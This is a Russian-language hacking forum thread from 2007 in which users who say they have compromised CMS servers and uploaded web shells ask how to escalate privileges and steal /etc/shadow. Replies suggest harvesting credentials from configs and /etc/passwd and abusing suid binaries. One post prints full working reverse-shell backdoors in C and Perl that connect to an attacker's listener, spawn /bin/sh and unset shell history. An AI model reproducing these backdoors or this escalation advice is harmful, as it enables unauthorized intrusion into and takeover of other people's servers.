ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)
  #1  
Старый 12.02.2007, 03:02
Аватар для Obormot
Obormot
Новичок
Регистрация: 08.02.2007
Сообщений: 2
Провел на форуме:
26452

Репутация: 2
По умолчанию Поднятие прав. Вопросы по использованию различных скриптов (любых, КРОМЕ ЭКСПЛОИТОВ!)

Added by L0rd_Ha0S: Вопросы по поднятию прав, по использованию разного рода скриптов, вроде web-шеллов, биндшеллов, бэкконект, и т.п. - задавать сюда! НЕ РАЗРЕШАЕТСЯ - вопросы о сплойтах, для этого есть специальные темы!

В общем думаю не один сталкивался с такой ситуацией.. Взломали мы какую-нибудь CMS (не важно что)
И залили наш шел... НО прав на редиктирование ГРУБО говоря index.php нет(
Мой вопролс водится к тому, какие методы существую для поднятия прав на удаленом сервере. На самом деле тупой дефейс мне не нужен, просто хочу понять смысл..
Дак вот, мной был залит бек дур на серв (.pl) нет катом получул входящее соединение. В общем как мне поступать дальше ) Сервер управляется 5.4-RELEASE FreeBSD.

Последний раз редактировалось L0rd_Ha0S; 10.12.2007 в 14:09..
 
Ответить с цитированием

  #2  
Старый 12.02.2007, 09:45
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

Посмотри статью Constantine
http://forum.antichat.ru/thread30813.html
Еще в разделе Статьи должно быть что-то по этой тематике.
 
Ответить с цитированием

  #3  
Старый 12.02.2007, 22:44
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Obormot
Во-первых нужно узнать, стоит ли на apache noexec. Если стоит, то ты никакой бинарник из под nobody запустить не сможешь. Если не стоит и система не патченная, то можно попробовать сплойт для этой ветки.
Почитай mysql-конфиги, возможно пасс оттуда подойдет на фтп.
Прочитай /etc/passwd, отсей аккаунты, имеющие шелл и попробуй их видом login=pass на фтп.
Ищи уязвимые демоны в системе (старые mysql, ftp, etc), уязвимости в которых позволяют повысить локальные привелегии.
В общем, способов существует масса, нужно только проявить фантазию.
 
Ответить с цитированием

  #4  
Старый 09.03.2007, 05:18
Аватар для Bac9l
Bac9l
Новичок
Регистрация: 25.02.2007
Сообщений: 8
Провел на форуме:
30402

Репутация: 2
Отправить сообщение для Bac9l с помощью ICQ
По умолчанию

Здравствуйте.
У меня вопрос примерно такой же. Залил р57 на серв, бэк коннект чет не контачит (вероятно кривые руки, неткатом слушаю порт, задаю в р57 ип, тыркаю кнопку и он виснет) может ли этому серв припятствовать? Есть ли другиt способы поднять права, или стащить /etc/shadow? Уж очень серв понравился)
 
Ответить с цитированием

  #5  
Старый 09.03.2007, 08:16
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

Пробуй биндить как перловыми скриптами так и сишным.
 
Ответить с цитированием

  #6  
Старый 09.03.2007, 14:18
Аватар для hsi
hsi
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме:
626169

Репутация: 167
По умолчанию

Если твой комп в локальной сети, то есть ты выходишь через шлюз, то backconnect не получится. Вполне возможно, что на сервере правильно настроенный фаерволл, который блокирует любой неразрешенный явно траффик.
Попробуй запустить backconnect вручную с помощью этих скриптов.
Backconnect на С:
Код:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
*	client:	nc -lp 9999
*	server: ./backconnect <ip_client> 9999
*********************************
*/

#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>

int main (int argc, char **argv) {
    struct sockaddr_in sock;
    int sd;
    char command[256];
    
    if (argc < 3) {
	printf("%s <host> <port>\n", argv[0]);
	return 1;
    }
    
    close(1);
    
    if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
	perror(argv[0]);
	return 1;
    }
    
    bzero(&sock, sizeof(sock));
    
    sock.sin_family = AF_INET;
    sock.sin_port = htons(atoi(argv[2]));
    inet_aton(argv[1], &sock.sin_addr);
    
    if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
	perror(argv[0]);
	return 1;
    }
    
    close(2);
    dup(sd);
    
    bzero(command, 256);
    while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
	system(command);
	bzero(command, 256);
    }
    
    close(sd);
    return 0;
}
Backconnect на Perl:
Код:
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Если есть какие-то вопросы - не стесняйся задавать.
 
Ответить с цитированием

  #7  
Старый 09.03.2007, 15:47
Аватар для gcc
gcc
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме:
333575

Репутация: 44
По умолчанию

Что то, сколько ни пробовал, su -m nobody не дает прав nobody. Значит система пропатчена, или это работает только при настоящем ssh ?
 
Ответить с цитированием

  #8  
Старый 09.03.2007, 16:07
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

При наличии терминала/псевдотерминала работает. По поводу поднятия прав - самый лучший вариант, конечно - чтение всяческих хисторей, пассвордов, конфигов. Кроме того, стоит поискать suid-бит на файлах, доступных на запись всем - такое тоже бывает. Ну и конечно суидные бинарники.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #9  
Старый 09.03.2007, 17:51
Аватар для Bac9l
Bac9l
Новичок
Регистрация: 25.02.2007
Сообщений: 8
Провел на форуме:
30402

Репутация: 2
Отправить сообщение для Bac9l с помощью ICQ
По умолчанию

hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?
 
Ответить с цитированием

  #10  
Старый 09.03.2007, 22:10
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от Bac9l  
hsi
Именно через шлюз, чет я раньше не подумал(. Пробовал на серве порт открыть, р57 опять виснет и нифига... Буду читать всяческие хистори, пассворы, конфиги)
Оп просканировал только что порты, там бо2к на 54320-м висит и прокси элитный, часов 5 назад еще ниче не было)))
Есть ли бо2к под линух?
Бред... С чего ты взял что там именно bo2k? Это тебе nmap сказал? С какими параметрами ты сканировал? Порт TCP или UDP? Сканер ошибся, просто 54320 - дефолтный порт Back Orifice 2000. Уж сколько лет, а он покоя народу не даёт. Кстати, если даже сканер не ошибся (точнее он всё равно ошибся), то это, вероятно, какой-нибдуь простенький honeypot для отлова всяких мег0 хекк3р0в.
И ещё:
Цитата:
BO2K is the most powerful network administration tool available for the Microsoft environment, bar none.
А прокси теперь значит админы не могут для своих целей поднять?
И что значит по-твоему элитный? То что он не светит remote addr и useragent? Как ты это определил? Различные чекеры тоже ошибаются =)
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 09.03.2007 в 22:17..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ